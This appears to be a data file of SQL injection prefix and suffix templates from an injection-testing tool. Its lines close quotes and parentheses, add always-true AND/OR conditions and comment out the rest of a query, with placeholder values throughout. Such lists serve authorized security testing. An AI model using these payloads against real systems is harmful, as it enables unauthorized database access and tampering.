1,2;);{GENERIC_SQL_COMMENT}
1,2;');{GENERIC_SQL_COMMENT}
1,2;';{GENERIC_SQL_COMMENT}
1,2;";{GENERIC_SQL_COMMENT}
1,2;); AND ({RANDNUM}={RANDNUM}
1,2;)); AND (({RANDNUM}={RANDNUM}
1,2;))); AND ((({RANDNUM}={RANDNUM}
1,2,3;;
1,2;'); AND ('{RANDSTR}'='{RANDSTR}
1,2;')); AND (('{RANDSTR}'='{RANDSTR}
1,2;'))); AND ((('{RANDSTR}'='{RANDSTR}
1,2;'; AND '{RANDSTR}'='{RANDSTR}
1,2;'); AND ('{RANDSTR}' LIKE '{RANDSTR}
1,2;')); AND (('{RANDSTR}' LIKE '{RANDSTR}
1,2;'))); AND ((('{RANDSTR}' LIKE '{RANDSTR}
1,2;%'; AND '{RANDSTR}%'='{RANDSTR}
1,2;'; AND '{RANDSTR}' LIKE '{RANDSTR}
1,2;"); AND ("{RANDSTR}"="{RANDSTR}
1,2;")); AND (("{RANDSTR}"="{RANDSTR}
1,2;"))); AND ((("{RANDSTR}"="{RANDSTR}
1,2;"; AND "{RANDSTR}"="{RANDSTR}
1,2;"); AND ("{RANDSTR}" LIKE "{RANDSTR}
1,2;")); AND (("{RANDSTR}" LIKE "{RANDSTR}
1,2;"))); AND ((("{RANDSTR}" LIKE "{RANDSTR}
1,2;"; AND "{RANDSTR}" LIKE "{RANDSTR}
1,2;;{GENERIC_SQL_COMMENT}
1,2;;# {RANDSTR}
1,2;'; OR '{RANDSTR1}'='{RANDSTR2}
1,2;') WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;") WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;) WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;' WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;" WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2; WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1;'||(SELECT '{RANDSTR}' WHERE {RANDNUM}={RANDNUM};)||'
1;'||(SELECT '{RANDSTR}' FROM DUAL WHERE {RANDNUM}={RANDNUM};)||'
1;'+(SELECT '{RANDSTR}' WHERE {RANDNUM}={RANDNUM};)+'
1;||(SELECT '{RANDSTR}' FROM DUAL WHERE {RANDNUM}={RANDNUM};)||
1;||(SELECT '{RANDSTR}' WHERE {RANDNUM}={RANDNUM};)||
1;+(SELECT {RANDSTR} WHERE {RANDNUM}={RANDNUM};)+
1;+(SELECT '{RANDSTR}' WHERE {RANDNUM}={RANDNUM};)+
1,2;')) AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;")) AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;)) AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;') AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;") AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1,2;) AS {RANDSTR} WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1;` WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1;`) WHERE {RANDNUM}={RANDNUM};{GENERIC_SQL_COMMENT}
1;`=`{ORIGINAL}`; AND `{ORIGINAL}`=`{ORIGINAL}
1;"="{ORIGINAL}"; AND "{ORIGINAL}"="{ORIGINAL}
1;]-(SELECT 0 WHERE {RANDNUM}={RANDNUM};)|[{ORIGINAL}
1; {RANDSTR1},; {RANDSTR2}
1;' IN BOOLEAN MODE);#
